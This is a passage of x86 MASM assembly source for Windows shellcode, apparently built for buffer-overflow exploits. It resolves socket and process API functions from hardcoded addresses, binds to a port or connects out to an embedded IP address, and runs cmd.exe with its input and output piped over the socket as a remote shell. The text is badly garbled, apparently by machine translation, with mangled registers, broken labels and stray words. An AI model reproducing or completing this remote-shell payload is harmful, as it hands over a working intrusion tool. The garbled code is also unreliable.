1006H; // Receive Timeout SOL_Socket EQU 0FFFFH;

// options for socket level Shell_Cmd_Pipe_OFFSET equ 3f0hSkOverflowFuncAddr_OFFSET equ 2d0hszShellNeedFunc_OFFSET equ 1d0h .code public _sk_Bind_ConnectShellCode public _GetDataSetOffset_Valuestart: _sk_Bind_ConnectShellCode proc push ebp; mov ebp, esp;; // generate stack space 0x800 of xor eax, eax; inc eax; shl eax,. 0BH; / / => 0x800 Sub ESP, EAX; JMP call_back; nop; jump_next: jmp run_Actual1; call_back: call jump_next; call_back_data_offset:; // jmp quit_return; // not run here as no necessary.;; // (void * ptr, int iLen, DWORD dwOld, DWORD dwNew) _Convert_Add_Sign_To_Null_Sign: push ebp; mov ebp, esp; push edi; push ecx; push eax; push edx; mov edi, FUNC_PARAM_1; // first parameter mov ecx, FUNC_PARAM_2;. // 2nd parameters. MOV EAX, FUNC_PARAM_3; // The third parameter. MOV EDX, FUNC_PARAM_4; // The 4th parameter.; // Repeat, replace until cx = 0NextAddsign: repnz scaSB; JCXZ Finish_Replace_Add_sign; Dec EDI; MOV BYTE PTR [EDI], DL; Inc ECX; JMP nextAddsign; Finish_ Replace_add_sign: POP EDX; POP EX; POP ECX; POP EDI; POP EBP; RET ;. / / Convert Eax's long-> AX standard word.; // rule: 1. High = 1, low is normal value.; / / 2. High = 2, low should = value -1_convert_sk_long_to_mansi_word: push ebx; push ecx; push edx; xor edx, edx; push eax; // low -> EBX POP EBX; SHR EBX, 10H; Push Eax; // high -> ecx pop ecx; _Convert_bx_To_al_Short:; // process ebx cmp bh, 1; je _convert_Sk_Long_IsNormal; dec bl; _convert_Sk_Long_IsNormal: mov al, bl; test edx, edx; jnz Finish_Convert_Next_Bit; shl eax, 8; push ecx; pop. Ebx; Inc EDX; JMP _CONVERT_BX_TO_AL_SHORTFINISH_CONVERT_NEXT_BIT: POP EDX; POP ECX; POP EBX;

ret; run_actual1: jmp run_actual2;; // get the address SkOverflowFuncAddr from szShellNeedFunc; // void _Get_Overflow_Addr_From_Shell_Func (void * SkOverflowFuncAddr,; // char * ShellNeedFuncStr,; // DWORD dwGetModuleHandleAddr,; // DWORD dwGetProcAddr); _Get_Overflow_Addr_From_Shell_Func: push ebp (Push ESI; PUSH EDI; PUSH EDX; PUSH ECX; PUSH EBX; PUSH EX; MOV EDI, FUNC_PARAM_1; // First Parameter MOV ESI, FUNC_PARAM_2; // 2nd parameter xor EBX, EBX ; xor ecx, ecx; mov cl, SHELL_NEED_FUNC_BODY_OFFSET; add esi, ecx; // esi = szShellCodeNeedFunc SHELL_NEED_FUNC_BODY_OFFSET mov cl, byte ptr [esi]; inc esi; _NextDllNameToLoad: push ecx; mov bl, byte ptr [esi]; inc ESI; // Skip size. push ESI; MOV EAX, FUNC_PARAM_3; // 3rd parameters.; // Mov Eax, getModuleHandlea_addr; // getModuleHandlea Call Eax; add esi, ebx; // Go to Next Add RESS.; now, ESI points to the number of functions. XOR ECX, ECX; MOV CL, BYTE PTR [ESI]; Inc ESI; / / Today, LOAD Each Function._NextFunction_Addr: Push Ecx; // Take strings Size MOV BL, BYTE PTR [ESI]; Inc ESI; Push Eax; Push ESI; Push ESI; // Procname Push ESI; // Module MoV ECX, FUNC_PARAM_4; // The third parameter.; // Mov Eax, GetModuleHandlea_addr; // getModuleHandlea Call ECX; MOV DWORD PTR [EDI], ES; Add EDI, 4; POP ESI; POP Eax; Add ESI, EBX; / / Pointer Moves to the next string. Pop Ecx; loop _nextFunction_addr; POP ECX; loop _nextdllnametoload; pop EX; POP EBX; POP ECX; POP EDX; POP EDI; POP ESI; POP EBP; RUN_ACTUAL2: JMP RUN_ACTUAL3_1;; // Create a jacket, listen to a port, return to the jacket. ;

// SOCKET _Create_Bind_Connect_Socket_To_Port (SkOverflowFuncAddr * pFuncAddr, szShellNeedFunc * pNeedFunc); _ Create_Bind_Connect_Socket_To_Port: push ebp; mov ebp, esp; xor eax, eax; // open 0xff (256) a byte variable region mov ax, 3f0h sub esp, eax. Push ESI; PUSH EDI; PUSH EDX; PUSH ECX; PUSH EBX; MOV ESI, FUNC_PARAM_1; // First parameter.; // WSAStartup (Werd, & WSD); Lea EDI, [EBP-340H]; // Open Space for temporary variables. Xor Eax, Eax; MOV Al, 2; Push EDI; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.wsastartup]; Call Eax;; // msocket = Socket (AF_INET, SOCK_STREAM, 0); = (2, 1, 0) xor Eax, Eax; Push Eax; Inc Eax; Push Eax; Inc Eax; Push Eax; MOV Eax, [ESI SkoverflowFuncaddr.socket]; Call Eax; // Take the Type MOV EDX , Func_param_2; lea ebx, [edx stconnectinfo.byconnecttype]; MOV CL, BYTE PTR [EBX]; PUSH EAX;; // Preparing parameter sockaddr_in lea EDI, [EBP-0F0H]; // is now the address of SockAddr_in. LEA EBX, [EDI SOCKADDR_IN.SIN_FAMILY]; XOR Eax, Eax; MOV Al, 2; MOV Word PTR [EBX], AX; //SockAddr_in.sin_family = AF_INET POP EAX;; // Now register status ..; // edi --- Temporary variable SockAddr_in, (SIN_FAMILY = AF_INET is assigned); // EDX - - Parameter 2 stconnectinfo link information; // eax --- created jacket newsocket.; // ESI --- Parameter 1 SkoverflowFuncaddr function address. CMP CL, 1; // Is it listening? Jne _isconnectToip; // no Jump. Push Eax; // <-2 @; // Get port value. Push Eax; // <-1 @ MOV Eax, [EDX stconnectinfo.dwlistenport]; call _convert_sk_long_to_ansi_word; MOV ECX, EAX; XCHG ch , cl; // port = htons (port) POP EAX; / / -> 1 @ lea ebx, [EDI SOCKADDR_IN.SIN_PORT]; MOV EDX, FUNC_PARAM_2; // 2nd parameter. MOV Word PTR [EBX], CX; //sockaddr_in.sin_port =

Port. xor Eax, Eax; Lea EBX, [EDI SOCKADDR_IN.SIN_ADDR]; MOV DWORD PTR [EBX], EAX; //sockaddr_in.sin_addr.s_un.s_addr = inaddr_any pop eax; // -> 2 @ push eax; // <- 3 @; // bind (msocket, (sockaddr *) & addrin, sizeof (addrin)); xor ECX, ECX; MOV CL, Size SockAddr_in; Push Ecx; Push EDI; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.bind]; Call Eax; // The following jump is used to eliminate the distance that is too far from the distance. JMP _TEMP_1; Run_Actual3_1: JMP Run_Actual3_2; _Temp_1: Pop Eax; // -> 3 @ push eax; // <- 4 @; // listen (msocket, 1); xor ECX, ECX; Inc ECX; PUSH ECX; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.Listen]; Call EAX Pop Eax; // -> 4 @ push eax; // <- 5 @; // newsocket = accept (msocket, (sockaddr *) & addrin, & ilen); XOR ECX, ECX; MOV CL, SIZE SOCKADDR_IN; LEA EDI , [EBP-0C0H]; MOV [EDI], ECX; Push EDI; // Ilen = SizeOf (AddRIN); Lea EDI, [EBP-0F0H]; Push EDI; // & SockAddr_in structure. Push Eax; MOV Eax, [ ESI SKOVERFLOWFUNCADDR.ACCE Pt]; Call Eax; Pop Edx; // -> 5 @ // Used to Listen's Socket. By Eax-> Edx Push Eax; // <- 6 @ // Get new connecting tubes ..; // Close to Listen Socket.; // CloseSocket (Msocket); Push Edx; Mov Eax, [ESI SKOVERFLOWFUNCADDR.CLOSESSOCKET]; Call Eax; Pop Eax; // -> 6 @ Cmp Eax, -1; JE wsocket_quitrightnow; JMP finish_get_connection_socket; _IndnectToip:; // Connect to an IP: port; // addrin.sin_family = AF_INET; / / addrin.sin_addr.s_un.s_addr = 0x0100007f;; // addrin.sin_port = 0x8b; // 139.; // Connect (socket, (socket, (sockaddr *);; // Prepare parameter sockaddr_in; // current register status ..;

// EDI --- Temporary variable sockaddr_in, (sin_family = AF_INET is assigned); // EDX --- Parameter 2 STCONNECTINFO link information; // Eax --- created jacket newsocket.; // ESI --- parameter 1 SkoverFlowFuncaddr function address.; // Get port value. Push Eax; // <- 1 @ MOV EAX, [EDX stconnectinfo.dwconnectport]; call _inter_sk_long_to_ansi_word; MOV ECX, EAX; XCHG ch, cl; // port = HTONS (port) Lea EBX, [EDI SOCKADDR_IN.SIN_PORT]; MOV Word PTR [EBX], CX; //sockaddr_in.sin_port = port.; // The following jump is used to eliminate the distance from the distance. It did not affect the source code jmp _temp_1_1; run_actual3_2:. jmp run_actual3; _temp_1_1: mov eax, [edx stConnectInfo.dwIP1]; call _convert_Sk_Long_To_Ansi_Word; mov ecx, eax; shl ecx, 10h; mov eax, [edx stConnectInfo.dwIP2 ]; call _convert_Sk_Long_To_Ansi_Word; mov cx, ax; lea ebx, [edi SOCKADDR_IN.sin_addr]; mov dword ptr [ebx], ecx; //SOCKADDR_IN.sin_addr.S_un.S_addr = stConnectInfo.dwIP1 dwIP2 pop eax; // -> 1 @ push eax; // <- 2 @; // connect (msocket, addr, 0x10); xor ECX, ECX; MOV CL, 10H; Push E Cx; // sizeof; push edi; // sockaddr * push eax; // msocket. Mov Eax, [ESI SKOVERFLOWFUNCADDR.CONNECT]; CALL EAX; // connect. MOV ECX, EAX; POP EAX; / .. / -> 2 @ jcxz Finish_Get_Connection_Socket; // connect success nop;; // now, connect failure; // closesocket (eax) push eax; mov eax, [esi SkOverflowFuncAddr.closesocket]; call eax; xor eax, eax; jmp WSocket_QuitRightNow; Finish_Get_Connection_Socket: push eax; push eax; pop edx; // edx = eax; // setsockopt (newsocket, SOL_SOCKET, SO_RCVTIMEO, (LPCTSTR) & iLen, sizeof (iLen)); lea edi, [ebp-0f0h ]; XOR EAX, EAX; MOV Al, 1;

MOV [EDI], EAX; SHL EAX, 2; // EAX = 4 Push Eax; Push EDI; MOV AX, SO_RCVTIMEO; Push Eax; MOV AX, SOL_Socket; Push Eax; Push EDX; MOV Eax, [ESI SkoverflowFuncaddr. Setsockopt]; Call EAX; Pop Eax; wsocket_quitrightnow:; // Return the result. POP EBX; POP ECX; POP EDX; POP EDI; POP ESI; MOV ESP, EBP; POP EBP; RUN_ACTUAL3: JMP RUN_ACTUAL4_1;; on the sleeve pipe, running processes pStrCmd;; // _ Create_Process_To_Handle (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe, LPCTSTR * pStrCmd); _ Create_Process_To_Handle: push ebp; mov ebp, esp; push edi; push esi; push edx; push ecx; Push EBX; PUSH EX; MOV EDI, FUNC_PARAM_2; // shell_cmd_pipe * pcmdpipedata; Push EDI; POP EDX; // EDX = EDI;; // MEMSET (& Si, 0, Sizeof (StartupInfo); xor Eax, Eax; LEA EDI, [EDI Shell_CMD_PIPE.NSTARTUPINFO]; Push EDI; // EDI = & Startupinfo; --- XOR ECX, ECX; MOV CL, SIZE STARTUPINFO; REP Stosb; Pop Edi; // ---; // si.cb = sizeof (startupinfo); Lea ESI, [EDI Startupinfo.cb]; MOV CL, SIZE Startupinfo; MOV [ESI], ECX;; // si.wshowwindow = sw_hide = 0; // need to do nothing; // si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;. lea esi, [edi STARTUPINFO.dwFlags]; mov cx, 101h; mov [esi], ecx;; // si.hStdInput = ShellStdinPipe; Push EDI; Lea EDI, [EDI Startupinfo.hstdinput]; Lea ESI, [EDX shell_cmd_pipe.shellstdinpipe]; MOV Eax, [ESI]; MOV [EDI], EAX; Pop Edi;; // si.hstdputput = shellstdoutpipe Push EDI; Lea EDI, [EDI Startupinfo.hstdoutput]; Lea ESI, [EDX Shell_CMD_PIPE.SHELLSTDOUTPIPE];

MOV EAX, [ESI]; MOV [EDI], EAX; Pop Edi;; // DuplicateHandle (GetCurrentProcess (), ShellStdoutPipe, getCurrentProcess (),; // & (si.hstderror), duplicate_same_access, true, 0); MOV esi, FUNC_PARAM_1; mov eax, [esi SkOverflowFuncAddr.GetCurrentProcess]; call eax; xor ecx, ecx; push ecx; // 0 inc ecx; push ecx; // TRUE inc ecx; push ecx; // DUPLICATE_SAME_ACCESS lea edx, [edi STARTUPINFO.hStdError]; push edx; //&(si.hStdError) push eax; // GetCurrentProcess (); push esi; mov esi, FUNC_PARAM_2; lea esi, [esi Shell_Cmd_Pipe.ShellStdoutPipe]; mov ebx, [ESI]; POP ESI; // The following jump is used to eliminate the distance caused by too far. The code does not affect the source program. JMP _TEMP_2; Run_Actual4_1: JMP Run_Actual4; _Temp_2: Push Ebx; // shellstdoutpipe Push Eax; // getCurrentProcess (); MOV Eax, [ESI SkoverflowFuncaddr.duplicateHandle]; Call Eax;; // CreateProcess (Null, "cmd.exe", null, null, true, 0,; //////// NULL, NULL, & si, & ProcessInformation) xor eax, eax; mov edi, FUNC_PARAM_2; lea edx, [edi Shell_Cmd_Pipe.ProcessInformation]; push edx;; // & ProcessInformation lea edx, [edi Shell_Cmd_Pipe.nstartupinfo]; push edx; ; // & si push Eax;; // null; push eax;; // null; push eax;; // 0; incov; push eax; // true; DEC EAX; push eax;; // null; Push eax;; // null; MOV EDX, FUNC_PARAM_3; Push EDX;; // lpctstr lpszcommand. push eax;; // null; MOV Eax, [ESI SkoverflowFuncaddr.createProcessa]; call eax;

// CloseHandle (ShellStdinPipe); mov eax, [edi Shell_Cmd_Pipe.ShellStdinPipe]; push eax; mov eax, [esi SkOverflowFuncAddr.CloseHandle]; call eax;; // CloseHandle (ShellStdoutPipe); mov eax, [edi Shell_Cmd_Pipe .Shellstdoutpipe]; Push Eax; MOV Eax, [ESI SkoverflowFuncaddr.CloseHandle]; Call EX; POP EAX; POP EBX; POP ECX; POP EDX; POP ESI; POP EDI; MOV ESP, EBP; POP EBP; RET; // memset (& si, 0, sizeof (STARTUPINFO)); run_actual4: jmp run_actual5;; // Close the socket is no longer used; // _ Close_All_Communication_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe); _ Close_All_Communication_Pipe: push ebp; mov ebp , ESH ESI; PUSH EDI; PUSH EDX; PUSH ECX; Push EBX; Push EX; MOV ESI, FUNC_PARAM_1; MOV EDI, FUNC_PARAM_2; // CloseSocket (msocket); MOV EAX, [EDI shell_cmd_pipe.msocket]; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.closeSocket]; Call Eax; // CloseHandle (Handle) .. Mov Eax, [EDI shell_cmd _Pipe.hreadpipe]; Push Eax; Mov Eax, [ESI SKOVERFLOWFUNCADDR.CLOSEHANDLE]; CALL EAX;; // CloseHandle (Handle) .. Mov Eax, [EDI shell_cmd_pipe.hwritepipe]; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.CloseHandle]; Call EX; POP EAX; POP EBX; POP ECX; POP EDX; POP EDI; POP ESI; MOV ESP, EBP; POP EBP; RET; Run_ACTUAL5: JMP Run_Actual6_1;; // Accept the data of the pipe , written into the pipe, the read pipe, is sent to the socket; // _ Recv_Write_Socket_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe); _ Recv_Write_Socket_Pipe:. push ebp; mov ebp, esp; xor eax, eax; mov ax, 2f0h; sub esp, eax ; // 496bytes, use for char sztemp [240]; push esi; push edi; push edx;

push ecx; push ebx; mov esi, FUNC_PARAM_1; // SkOverflowFuncAddr * pAddr; mov edi, FUNC_PARAM_2; // Shell_Cmd_Pipe * pCmdPipeData;; // dwBreak = 1 lea edx, [ebp - size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwBreak]; xor eax , eax; inc eax; mov [edx], eax;; // while (bBreak!) _While_Read_Data_Loop:; // monitor dwBreak == 0 lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwBreak]; mov eax, [? edx]; test eax, eax; jz _Quit_While_Read_Data_Loop_1;; // iLen = recv (newsocket, szTemp, sizeof (szTemp) -1, 0); xor eax, eax; push eax; mov al, SIZE_OF_TEMP_BUFFER; push eax; lea eax , [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.szTemp]; push eax; lea ebx, [edi Shell_Cmd_Pipe.msocket]; mov eax, [ebx]; push eax; mov eax, [esi SkOverflowFuncAddr.recv]; call eax; CMP EAX, -1; JNE _NEXTSTEP_RECEIVE_TEST; PUSH EAX; Pop Edx; Mov Eax, [ESI SKOVERFLOWFuncadd r.GetLastError]; call eax; cmp ax, 10060; // timeout je _Read_StdoutPipe; _Quit_While_Read_Data_Loop_1:? jmp _Quit_While_Read_Data_Loop; //error._NextStep_Receive_Test: test eax, eax; // eax == 0 je _Quit_While_Read_Data_Loop; // break;? JNG _READ_STDOUTPIPE ;; // Receive_ok_occure:; // if (Ilen> 0); // Writefile (HWritePipe, Sztemp, Ilen, & DWTEMP, NULL) xor Edx, EDX; Push Edx; // Null Lea EBX, [EBP- SIZE Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwTemp]; push ebx; // & dwTemp push eax; // iLen lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.szTemp]; push ebx; // szTemp; mov eax, [edi

Shell_cmd_pipe.hwritepipe]; Push Eax; Mov Eax, [ESI SkoverflowFuncaddr.writefile]; Call Eax; Test Eax, Eax; JZ _Quit_While_Read_Data_LOOP; // WriteFile (.) == 0, failed, tube interrupt.; // The following jump is used to eliminate the distance from the distance. The code does not affect the source program. JMP _TEMP_3; Run_Actual6_1: JMP Run_Actual6; _Temp_3: _READ_STDOTPIPE:; // peeknamedpipe (hreadpipe, null, 0, null, & dwtemp, NULL); xor eax, eax; push eax; // NULL lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwTemp]; push edx; // & dwTemp push eax; // NULL push eax; // 0 push eax; / / NULL mov eax, [edi Shell_Cmd_Pipe.hReadPipe]; push eax; // hReadPipe mov eax, [esi SkOverflowFuncAddr.PeekNamedPipe]; call eax; mov eax, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwTemp]; test eax, eax; jz _No_Data_To_Read_Yet;; // ReadFile (hReadPipe, szTemp, sizeof (szTemp), & dwTemp, NULL) xor eax, eax; push eax; // NULL lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Writ e_Socket_Pipe_Data.dwTemp]; push edx; // & dwTemp mov al, SIZE_OF_TEMP_BUFFER; push eax; // sizeof (szTemp); lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.szTemp]; push edx; // szTemp; mov eax, [EDI shell_cmd_pipe.hreadpipe]; Push Eax; // HreadPipe Mov Eax, [ESI SKOVERFLOWFUNCADDR.READFILE]; CALL EAX; // readfile.; // if (readfile (...) == 0)? Then quit . test eax, eax; je _Quit_While_Read_Data_Loop;; // send (newsocket, szTemp, dwTemp, 0); xor eax, eax; push eax; // 0 mov eax, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.dwTemp]; push eax ; // dwtemp;

lea edx, [ebp- size Recv_Write_Socket_Pipe_Data Recv_Write_Socket_Pipe_Data.szTemp]; push edx; // szTemp; mov eax, [edi Shell_Cmd_Pipe.msocket]; push eax; // socket mov eax, [esi SkOverflowFuncAddr.send].; call eax; cmp eax, -1; je _Quit_While_Read_Data_Loop; jmp _Read_StdoutPipe; // continue to read next data._No_Data_To_Read_Yet: jmp _While_Read_Data_Loop; _Quit_While_Read_Data_Loop: pop ebx; pop ecx; pop edx; pop edi; pop esi; mov esp, ebp; pop ebp; ret; run_actual6: jmp run_actual;; // BOOL _Create_Two_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe); _ Create_Two_Pipe: push ebp; mov ebp, esp; xor eax, eax; mov al, 0f0h; sub esp, eax; // Open space Push ESI; Push EDI; Push EDX; PUSH ECX; Push Ebx; MOV ESI, FUNC_PARAM_1; MOV EDI, FUNC_PARAM_2; XOR EBX, EBX; Lea EDI, [EBP-10H]; // SecurityAttributes.lpsecurityDescriptor = Null; // default acl lea edx, [EDI Security_Attributes.lpsecuri tyDescriptor]; mov [edx], ebx;; // SecurityAttributes.bInheritHandle = TRUE; // will inherit handle lea edx, [edi SECURITY_ATTRIBUTES.bInheritHandle]; inc ebx; mov [edx], ebx;; // SecurityAttributes. nLength = sizeof (SECURITY_ATTRIBUTES); lea edx, [edi SECURITY_ATTRIBUTES.nLength]; mov bl, size SECURITY_ATTRIBUTES; mov [edx], ebx; xor ebx, ebx;; // bResult = CreatePipe (& hReadPipe, & ShellStdoutPipe, & SecurityAttributes, 0 );. output into _FUNC_PARAM_2's variables push edi; // save push ebx;. // 0 push edi; // & SecurityAttributes mov edi, FUNC_PARAM_2; lea edx, [edi Shell_Cmd_Pipe.ShellStdoutPipe]; mov [edx], ebx;

// ShellStdoutPipe = 0; push edx; // & ShellStdoutPipe lea edx, [edi Shell_Cmd_Pipe.hReadPipe]; push edx ;; // & hReadPipe mov eax, [esi SkOverflowFuncAddr.CreatePipe]; call eax; pop edi; // restore . test eax, eax; je _Create_Pipe_Quit_Error;; // Create Second Pipe;. // CreatePipe (& ShellStdinPipe, & hWritePipe, & SecurityAttributes, 0); xor ebx, ebx; push ebx; // 0 push edi; // & SecurityAttributes mov edi, FUNC_PARAM_2; lea edx, [edi Shell_Cmd_Pipe.hWritePipe]; push edx; // & hWritePipe lea edx, [edi Shell_Cmd_Pipe.ShellStdinPipe]; mov [edx], ebx; push edx; // & ShellStdinPipe mov eax, [esi SkOverflowFuncAddr .CreatePipe]; call eax; test eax, eax; je _Create_Pipe_Quit_Error; xor eax, eax; inc eax; jmp _Create_Pipe_Quit; _Create_Pipe_Quit_Error: xor eax, eax; jmp _Create_Pipe_Quit; nop; _Create_Pipe_Quit: pop ebx; pop ecx; pop edx; pop EDI; POP ESI; MOV ESP, EBP; POP EBP; RUN_ACTUAL: LEA ESI, [ESP]; MOV ESI, [ESI]; // EBX is the address XOR ECX, ECX; MOV CX, MYDATAOFFSET; Add ESI, ECX; // ESX is future data Address. // EBP-0x2FF, is the szshellneedfunc structure. Lea EDI, [EBP - SZSHELLNEDFUNC_OFFSET]; Push EDI; // mydebugadd ----- MOV CX, _Size_AllData; rep movsb; // also include connection The information structure of the information structure POP EDI; PUSH EDI; / / converts ' ' to "/ x00"; // void _convert_add_sign_to_null_sign (void * PTR, INT Ilen, DWORD DWOLD, DWORD DWNEW); xor ECX, ECX; Push ECX ; // - Parameter 4 MOV CL, ' '; Push ECX; // --- Parameter 3 MOV CX, _Size_szshellneedFunc; Push ECX; // --- Parameter 2 xor EBX, EBX;

mov bl, String_Of_Data_Offset; add edi, ebx; // edi points to the real szShellNeedFunc push edi; // --- parameters 1 call _Convert_Add_Sign_To_Null_Sign; add esp, 10h;; // get the address SkOverflowFuncAddr from szShellNeedFunc; // void _Get_Overflow_Addr_From_Shell_Func ( SkOverflowFuncAddr * pSkOverflowFuncAddr, char * ShellNeedFuncStr, DWORD dwGetModuleHandleAddr, DWORD GetProcAddr) xor ecx, ecx; mov cx, _GetModuleHandle_Addr_Offset; mov esi, edi; add esi, ecx; mov eax, [esi 4] push eax;; // GetProcAddress_Addr mov eax, [esi]; push eax;; // GetModuleHandle_Addr push edi;; // ebp-0x1ff, the structure is SkOverflowFuncAddr lea esi, [ebp-SkOverflowFuncAddr_OFFSET];. push esi; call _Get_Overflow_Addr_From_Shell_Func; add esp, 10h; pop edi ;; // Create a socket, listening on a port / connection to a ip:. port, returns the sleeve; // SOCKET _Create_Bind_Connect_Socket_To_Port (SkOverflowFuncAddr * pFuncAddr, szShellNeedFunc * pNeedFunc); push edi; push esi; call _Create_Bind_Connect_Socket_To_Port; addESP, 8; Test Eax, EAX; JZ Main_quit_now; // Socket failed. Lea EDI, [EBP-shell_cmd_pipe_offset]; Lea EBX, [EDI shell_cmd_pipe.msocket]; MOV [EBX], EAX; // Save results to msocket in;. // BOOL _Create_Two_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe);; // create two pipe, used to bind shell push edi;. push esi; call _Create_Two_Pipe; add esp, 8; test eax, eax; jz Main_Quit_Now;; // now is ok;. // on the sleeve pipe, running processes pStrCmd;; // _ Create_Process_To_Handle (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe, LPCTSTR * pStrCmd); lea edi, [ebp-szShellNeedFunc_OFFSET]; XOR EAX, EAX; MOV AL, STRING_OF_DATA_OFFSET; //cmd.exe command line offset in the data. Add Edi, Eax; Push EDI; //

CMD.exe "pointer Lea EDI, [EBP-shell_cmd_pipe_offset]; Push EDI; Push ESI; Call _Create_Process_to_Handle; Add ESP, 0CH; // Accept the data of the tubing, write into the PIPE, read the PIPE, and send it to the socket. // _ Recv_Write_Socket_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe); push edi; push esi; call _Recv_Write_Socket_Pipe; add esp, 8;; // Close the socket is no longer used; // _ Close_All_Communication_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe) ; push edi; push esi; call _Close_All_Communication_Pipe add esp, 8;; // Close the process xor eax, eax; push eax; lea edx, [edi Shell_Cmd_Pipe.ProcessInformation]; mov eax, [edx PROCESS_INFORMATION.hProcess]; push eax; mov eax, [esi SkOverflowFuncAddr.TerminateProcess]; call eax; Main_Quit_Now:; // now available ..; // exit now xor eax, eax; push eax; mov eax, [esi SkOverflowFuncAddr.ExitProcess];. Call EAX; RET ;; // qit_return:; // Restore Stack MOV ESP, EBP; POP EBP; NOP; NOP ;; / / The following is data: MyDataOffset EQU $ -Call_back_data_ Offset; // call the function, the distance to where .ConnectTypeOffset equ $ -start; ListenPortOffset equ ConnectTypeOffset stConnectInfo.dwListenPort; ConnectIP1Offset equ ConnectTypeOffset stConnectInfo.dwIP1; ConnectIP2Offset equ ConnectTypeOffset stConnectInfo.dwIP2; ConnectPortOffset equ ConnectTypeOffset stConnectInfo.dwConnectPort; MyConnectInfo stConnectInfo <2, 0ffh, 0ffffh, 02010151h, 01250201h, 01a801c0h, 02010158h> String_Of_Data_Offset equ $ -MyConnectInfo; ExecCommandOffset equ $ -start; szShellNeedFunc db 'cmd.exe ' db ' DB '

DB ' '; // below is the function information. SHELL_NEED_FUNC_BODY_OFFSET EQU $ -szshellneedFunc; // This is the shell function and DLL offset DB 02HDB 0EH,' Kernel32.dll ',' 'DB 0EHDB 11H,' TerminateProcess ',' 'DB 0BH,' CreatePipe ',' 'DB 10h,' getStartupinfoa ',' 'DB 0FH,' CreateProcessa ',' 'DB 0EH,' PEEKNAMEDPIPE ',' 'DB 0CH,' GLOBALLOC ',' 'DB 0BH,' Writefile ',' 'DB 09H,' Readfile ',' 'DB 06H,' Sleep ',' 'DB 0CH,' EXITPROCESS ',' 'DB 0EH,' GetLastError ',' 'DB 10H,' DuplicateHandle ',' 'DB 12H,' getCurrentProcess ',' 'DB 0ch,' CloseHandle ',' 'DB 0BH,' WS2_32.dll ',' 'DB 0BHDB 07H,' Socket ',' 'DB 05H,' Bind ',' 'DB 07H,' Listen ',' 'DB 07H,' Accept ',' 'DB 05H,' Send ',' 'DB 05H,' Recv ',' 'Db 0bh,' setsockopt ',' 'DB 0BH,' WSAStartup ',' 'DB 0ch,' CloseSocket ','

'DB 08H,' Connect ',' 'DB 0ch,' getHostName ',' 'DB' _ getModuleHandle_addr_offset Equ $ - szShellNeedFuncGetModuleHandleOffset equ $ -start; GetModuleHandleA_Addr dd 77e756dbhGetProcAddressOffset equ $ -start; GetProcAddressA_Addr dd 77e7564bh_size_szShellNeedFunc equ $ -szShellNeedFunc 1_size_AllData equ $ -MyConnectInfo 1_sk_Bind_ConnectShellCode endpdb '------------------- ------------------------------------ '; // Offset in the code in the code stDataSetOffset struct dwConnectType DD 0; dwListenPort DD 0; dwConnectIP1 DD 0; dwConnectIP2 DD 0; dwConnectPort DD 0; dwExecCommand DD 0; wSizeExecCommand DW 0; wReserv1 DW 0 dwGetModuleHandle DD 0; dwGetProcAddress DD 0; stDataSetOffset ends_GetDataSetOffset_Value proc push ebp; mov ebp, esp; push esi; push edi; push edx; push ecx; push ebx; push eax; mov esi, FUNC_PARAM_1; lea edi, [esi stDataSetOffset.dwConnectType]; mov eax, ConnectTypeOffset; mov [edi], eax; lea edi , [ESI StDataSetOffset.dwlistenport]; MOV Eax, Listenp ortOffset; mov [edi], eax; lea edi, [esi stDataSetOffset.dwConnectIP1]; mov eax, ConnectIP1Offset; mov [edi], eax; lea edi, [esi stDataSetOffset.dwConnectIP2]; mov eax, ConnectIP2Offset; mov [ edi], eax; lea edi, [esi stDataSetOffset.dwConnectPort]; mov eax, ConnectPortOffset; mov [edi], eax; lea edi, [esi stDataSetOffset.dwExecCommand]; mov eax, ExecCommandOffset; mov [edi], eax Lea EDI, [ESI stdatasetoffset.wsizeexeccommand]; MOV AX, Shell_Need_Func_Body_offset; MOV [EDI], Eax; Lea EDI, [ESI stdatasetoffset.dwgetModuleHandle];